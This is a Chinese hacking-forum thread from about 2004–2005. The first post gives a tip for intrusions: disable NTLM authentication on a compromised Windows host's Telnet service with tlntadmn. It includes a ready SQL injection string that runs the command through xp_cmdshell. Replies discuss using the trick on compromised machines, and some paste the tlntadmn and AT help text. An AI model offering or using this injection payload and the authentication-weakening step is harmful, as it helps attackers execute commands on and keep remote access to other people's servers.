[原创]告诉大家一个小技巧 一直没人提到过的东东
文章作者:紫幻[EST顾问团成员]信息来源:邪恶八进制 中国
相信大家都对telnet比较熟悉吧。hacking的时候经常用到的系统自带shell尤其是注射的时候,但是最讨厌的就是ntlm认证了,以前大家去掉ntlm的方法一般有2种。
1 上传ntml.exe 这种方法有很多缺点,比如:对方有杀毒软件,很多网段屏蔽了TFTP.
2 直接写入telnet的配置信息到文本中然后在用shell执行。 这种办法非常麻烦。
今天我给大家介绍我一直在使用的办法,压箱底的哦。
那就是直接运行命令:tlntadmn config sec = -ntlm
注射的话可以直接运行:;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'--
运行以后就去掉了该死的ntlm认证:) 赶快去试试吧。
最后祝大家圣诞快乐!!! 谢谢大家的支持。以后我研究出什么新东东一定会第一时间发到这里来。
你们的支持就是我最大的源动力!!! [quote][b]下面是引用紫幻于2004-12-23 20:02发表的:[/b]
谢谢大家的支持。以后我研究出什么新东东一定会第一时间发到这里来。
你们的支持就是我最大的源动力!!![/quote]
我发觉E.S.T顾问团成员都有一个特点 就是喜欢伪装成很菜的样子 好是好,说说why?就更好了??!谢谢。 厉害。。以前的浪客联盟没了。他也消失。 [quote][b]下面是引用yjd于2005-04-10 12:00发表的:[/b]
厉害。。以前的浪客联盟没了。他也消失。[/quote]
其实他们都工作了 不过幻哥还是偶尔会到邪恶八进制来玩的 只不过不固定时间而已 工作是一种比较摧残人的创造性的事情。 呵呵。谢谢这些兄弟顶我。还知道我是以前浪客的。看来都是老朋友了。其实我天天都来8进制的,只不过我现在喜欢潜水了,偶尔会冒泡:)我最近写了一个文章投稿了,等非安全刊登我马上发到论坛上来。
[s:39] [s:39] [s:39] [s:39] [s:39] [s:39] [s:39] [s:39] [quote][b]下面是引用紫幻于2005-04-11 10:37发表的:[/b]
呵呵。谢谢这些兄弟顶我。还知道我是以前浪客的。看来都是老朋友了。其实我天天都来8进制的,只不过我现在喜欢潜水了,偶尔会冒泡:)我最近写了一个文章投稿了,等非安全刊登我马上发到论坛上来。
[s:39] [s:39] [s:39] [s:39] [s:39] [s:39] [s:39] [s:39][/quote]
投稿文章最好3个月后再发到网络 如果实在想提前发 幻哥可以考虑内部版面 密码在群公告里有 C:\>tlntadmn /?
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue
| -s | -k | -m | config config_options
所有会话用 'all'。
-s sessionid 列出会话的信息。
-k sessionid 终止会话。
-m sessionid 发送消息到会话。
config 配置 telnet 服务器参数。
common_options 为:
-u user 指定要使用其凭据的用户
-p password 用户密码
config_options 为:
dom = domain 设定用户的默认域
ctrlakeymap = yes|no 设定 ALT 键的映射
timeout = hh:mm:ss 设定空闲会话超时值
timeoutactive = yes|no 启用空闲会话。
maxfail = attempts 设定断开前登录尝试的最多失败数。
maxconn = connections 设定最大连接数。
port = number 设定 telnet 端口。
sec = [+/-]NTLM [+/-]passwd
设定身份验证机构
mode = console|stream 指定操作模式。
功能比较强大的一个外部命令,呵呵,现在才知道
这命令主要是管理TELNET服务的,还可以改TELNET服务的端口,关闭、开启NTLM严正等等好多功能 2000pro的系统,出现如下错误,是怎么回事?
C:\Documents and Settings\Administrator>tlntadmn config sec=-ntlm
错误: 您必须有管理特权
C:\Documents and Settings\Administrator>tlntadmn /?
错误: 您必须有管理特权 呵呵,妙~以前跟着紫纪老大学习,技术突飞猛进!
现在,一个天,一个地的差别~后悔莫级呀~~~
以前浪客的badboy现在会重新站起来的!不会再做
一个拿着别人的工具和脚本漏洞乱搞的人啦! 34楼的,这个本来就是要在有管理权的情况下用的吗?没有管理权,就算你telnet上去了!
有密码给你进去吗? 菜鸟请教:
在win2000下( 默认安装),
以administrator身份运行命令:tlntadmn config sec = -ntlm
返回 错误: 您必须有管理特权
何故? 如何解决? [s:56] 有没有快速提高技术的方法,至少多WINDOMS2000 CMD所常用的命令做一下简介也好呀 晕了
C:\>tlntadmn
错误: 您必须有管理特权
确实是个好方法,省去了不少麻烦。
一般情况下不敢用tftp了,在X档案中看过一篇利用tftp来记录入侵者IP的信息。
一个假的tftp,不过一般网管也没那么变态。
但是tftp对他们来说有时候没大多用处,他们有管理软件,或者3389等。
不记得将tftp变成记录ip 信息的工具是怎么样实现的了,
有信息的朋友给我发个DOC,谢先了!
[url=hacklife@126.com]E-mail[/url] 想请问下这种方法一般是用在什么情况下的? 应该没这么简单吧。。。。!我TELNET 。FTP从来就没成功过!!! 想请教下
他是在进去肉鸡后才可以尺行的对吧
那么说来对我没什么用了~~~~~~~ tlntadmn config sec = -ntlm
不好意思
这句具体是怎么解释的 啊 24楼:应该是在客户端运行的吧
25楼:tlntadmn config sec = -ntml
tlntadmn是telnet服务器管理程序 这段命令意思应该是:telnet服务端的配置部分要不要设置ntml验证,-ntml就是不要ntml验证。 config:配置 哦!谢谢了! 不是很有用!
还是谢谢了! 呵呵,又得学习了。 原来可以发这种直接粘贴帮助的帖子阿
C:\Documents and Settings\Administrator>at /?
AT 命令安排在特定日期和时间运行命令和程序。
要使用 AT 命令,计划服务必须已在运行中。
AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
AT [\\computername] time [/INTERACTIVE]
[ /EVERY:date[,...] | /NEXT:date[,...]] "command"
\\computername 指定远程计算机。 如果省略这个参数,
会计划在本地计算机上运行命令。
id 指定给已计划命令的识别号。
/delete 删除某个已计划的命令。如果省略 id,
计算机上所有已计划的命令都会被删除。
/yes 不需要进一步确认时,跟删除所有作业
的命令一起使用。
time 指定运行命令的时间。
/interactive 允许作业在运行时,与当时登录的用户
页:
[1]